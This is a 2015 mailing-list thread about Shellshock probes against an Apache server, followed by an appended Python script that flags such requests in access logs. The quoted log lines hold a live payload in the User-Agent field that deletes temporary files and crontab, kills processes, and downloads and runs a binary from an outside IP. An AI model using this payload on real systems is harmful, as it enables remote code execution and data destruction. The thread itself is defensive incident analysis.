In the end the attack was successful. The log shows the last
command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1"
200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd
/tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm
-rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl
lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget
http://80.68.94.216/sc.gif ; curl -O
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup
./sc.gif & \");'"
But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is
there something I can do to allow only local scripts to be
executed?
On 02.07.2015 15:13, Yehuda Katz wrote:
It is an attempt to exploit a specific
configuration. By the fact that apache returned a 404 (the
log line says so), you can see that attempt was not
successful.
- Y
Sent from a gizmo with a very small keyboard and
hyperactive autocorrect.
On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@xxxxxxxx> wrote:
Hello
A hacker attacked an apache2 web server by HTTP injection.
The log shows what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
/phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() {
:;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/
;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf
/tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9
wget fetch curl lwp-download b f r xx y i.gif print start
pscan pnscan ps ; wget
http://80.68.94.216/sc.gif ; curl -O
http://80.68.94.216/sc.gif ; chmod
+x sc.gif ; nohup ./sc.gif & \");'"
How can I prevent this in the future and how can I
reproduce?
I tried to reproduce but it is not clear how he launched this
command and I want to know so I can test my
vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.
Thank you
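
Added example (not part of the original thread and not code from any of the posters): a Python scan of Apache combined-format access logs for the "() {" function-definition prefix seen in the User-Agent field above, listing the path and status Apache returned for each hit. The sample lines are constructed (documentation IP addresses, a harmless echo in place of the command), and the names find_shellshock_probes and SAMPLE_LOG are chosen for this example.

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
# Apache escapes embedded quotes as \" so each quoted field allows backslash escapes.
QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + QUOTED + r')" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>' + QUOTED + r')" "(?P<agent>' + QUOTED + r')"$'
)

# Bash function-definition prefix that the logged header value starts with.
SHELLSHOCK = re.compile(r'\(\)\s*\{')

# Constructed sample lines: paths, statuses and sizes mirror the thread,
# IP addresses are documentation ranges, the command is a harmless echo.
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;}; /bin/echo \"probe\""',
    r'192.0.2.10 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;}; /bin/echo \"probe\""',
    r'198.51.100.7 - - [01/Jul/2015:17:03:10 +0300] "GET /index.html HTTP/1.1" 200 885 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def find_shellshock_probes(lines):
    """Return one dict per log line whose request, referer or user-agent
    contains the "() {" prefix. Lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue
        fields = [f for f in ("request", "referer", "agent")
                  if SHELLSHOCK.search(m.group(f))]
        if fields:
            parts = m.group("request").split(" ")
            hits.append({
                "host": m.group("host"),
                "time": m.group("time"),
                "path": parts[1] if len(parts) > 1 else "",
                "status": int(m.group("status")),
                "fields": fields,
            })
    return hits

if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["path"], hit["status"], hit["fields"])
```

The status column only records what Apache answered; whether a flagged request reached a handler that passed the header to bash has to be checked on the host itself.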